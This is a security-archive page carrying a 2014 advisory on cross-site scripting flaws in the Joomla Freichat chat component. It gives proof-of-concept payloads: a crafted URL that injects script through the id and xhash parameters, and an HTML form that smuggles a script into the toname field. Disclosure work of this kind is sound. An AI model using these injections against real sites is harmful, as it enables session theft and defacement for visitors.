what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Freichat Cross Site Scripting

Joomla Freichat Cross Site Scripting
Posted Mar 15, 2014
Authored by Mahmoud Ghorbanzadeh

Joomla Freichat component suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-5952
SHA-256 | f26a565ccf8266ff4e862546262b26a06d4edba8af7e2c7c88770059723d0589

Joomla Freichat Cross Site Scripting

Change Mirror Download
Hello,

Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.


File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>


File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post" enctype="multipart/form-data">
            <label
for="file">choose file to send</label><br/><br/>
            <input id ="fromid"
type="hidden" name="fromid"/>
            <input id="fromname"
type="hidden" name="fromname"/>
            <input id="toid"
type="hidden" name="toid"/>
                                    <!--
<input id="toname" type="hidden"
name="toname"/> -->
            <input id="toname"
type="hidden" name="toname"
value="<script>alert('XSS')</script>"/>
            <input type="file"
name="file" id="file" value="a.jpeg" />
            <br /><br/>
            <input  class ="frei_upload_button"
type="submit" name="submit" value="Send" />
        </form>
        </div>
    </body></html>

Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.

Best Regards.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close